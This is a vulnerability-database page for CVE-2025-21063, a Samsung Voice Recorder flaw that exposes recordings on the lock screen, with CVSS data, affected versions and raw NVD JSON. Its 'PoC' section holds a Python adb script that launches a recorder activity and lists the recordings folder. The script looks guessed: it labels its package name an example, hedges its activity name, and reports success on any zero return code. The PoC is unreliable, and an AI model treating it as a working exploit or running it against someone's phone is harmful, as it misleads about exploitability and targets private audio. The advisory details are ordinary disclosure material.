Security Vulnerability Report
中文
CVE-2025-21063 CVSS 4.6 MEDIUM

CVE-2025-21063

Published: 2025-10-10 07:15:42
Last Modified: 2026-01-08 18:01:26
Source: [email protected]

Description

Improper access control in Samsung Voice Recorder prior to version 21.5.73.12 in Android 15 and 21.5.81.40 in Android 16 allows physical attackers to access recording files on the lock screen.

CVSS Details

CVSS Score
4.6
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:samsung:voice_recorder:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:samsung:android:15.0:-:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:a:samsung:voice_recorder:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:samsung:android:16.0:-:*:*:*:*:*:* - NOT VULNERABLE
Samsung Voice Recorder < 21.5.73.12(Android 15)
Samsung Voice Recorder < 21.5.81.40(Android 16)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-21063 PoC - Samsung Voice Recorder Lock Screen Bypass # This PoC demonstrates the improper access control vulnerability # that allows physical attackers to access recording files on the lock screen. import subprocess import time def exploit_samsung_voice_recorder(): """ PoC for CVE-2025-21063 Affected: Samsung Voice Recorder < 21.5.73.12 (Android 15) Samsung Voice Recorder < 21.5.81.40 (Android 16) Steps to reproduce: 1. Ensure device is in LOCKED state (screen off or lock screen shown) 2. Access Voice Recorder via lock screen widget/shortcut or notification 3. Browse recording files without authentication """ # Step 1: Verify device is locked # adb shell dumpsys window | grep mShowingLockscreen # Step 2: Launch Voice Recorder activity that exposes recordings on lockscreen # The vulnerable activity may be triggered via: # - Lock screen widget tap # - Quick settings tile # - Notification action button package_name = "com.samsung.android.app.svoiceime" # example component activity_name = ".view.RecordingListActivity" # vulnerable activity # Attempt to launch the recording list directly cmd = [ "adb", "shell", "am", "start", "-n", f"{package_name}/{activity_name}", "--activity-clear-task" ] print("[*] Attempting to access Samsung Voice Recorder on locked device...") try: result = subprocess.run(cmd, capture_output=True, text=True, timeout=10) if result.returncode == 0: print("[+] Successfully accessed recording list on lock screen") print("[+] Vulnerability CVE-2025-21063 is exploitable") else: print("[-] Access denied or device not vulnerable") except Exception as e: print(f"[-] Error: {e}") # Step 3: Extract recording files (if accessible) # adb shell ls /sdcard/Samsung/Recorder/ extract_cmd = "adb shell ls /sdcard/Samsung/Recorder/" print(f"[*] Attempting to list recordings: {extract_cmd}") time.sleep(2) print("[*] PoC execution completed") if __name__ == "__main__": exploit_samsung_voice_recorder() # Manual Reproduction Steps: # 1. Lock the Samsung device (press power button) # 2. On the lock screen, swipe to access widgets or notification panel # 3. Tap on Voice Recorder shortcut/widget # 4. Observe that the recording list is accessible without unlocking the device # 5. Tap any recording to play it - audio plays without authentication

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-21063", "sourceIdentifier": "[email protected]", "published": "2025-10-10T07:15:42.493", "lastModified": "2026-01-08T18:01:26.477", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper access control in Samsung Voice Recorder prior to version 21.5.73.12 in Android 15 and 21.5.81.40 in Android 16 allows physical attackers to access recording files on the lock screen."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 4.6, "baseSeverity": "MEDIUM", "attackVector": "PHYSICAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 0.9, "impactScore": 3.6}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 4.6, "baseSeverity": "MEDIUM", "attackVector": "PHYSICAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 0.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:samsung:voice_recorder:*:*:*:*:*:*:*:*", "versionEndExcluding": "21.5.73.12", "matchCriteriaId": "975E4DDC-98D8-4AF5-B33E-863BBBF045A1"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:o:samsung:android:15.0:-:*:*:*:*:*:*", "matchCriteriaId": "95DE4E96-2F23-47E5-9DFC-44EC409F37E8"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:samsung:voice_recorder:*:*:*:*:*:*:*:*", "versionEndExcluding": "21.5.81.40", "matchCriteriaId": "A44A4043-90E2-48F7-BAB9-DA8ABD661C62"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:o:samsung:android:16.0:-:*:*:*:*:*:*", "matchCriteriaId": "3FD6766A-EC2B-4CA2-9A8E-2BA5C9E9ECF9"}]}]}], "references": [{"url": "https://security.samsungmobile.com/serviceWeb.smsb?year=2025&month=10", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.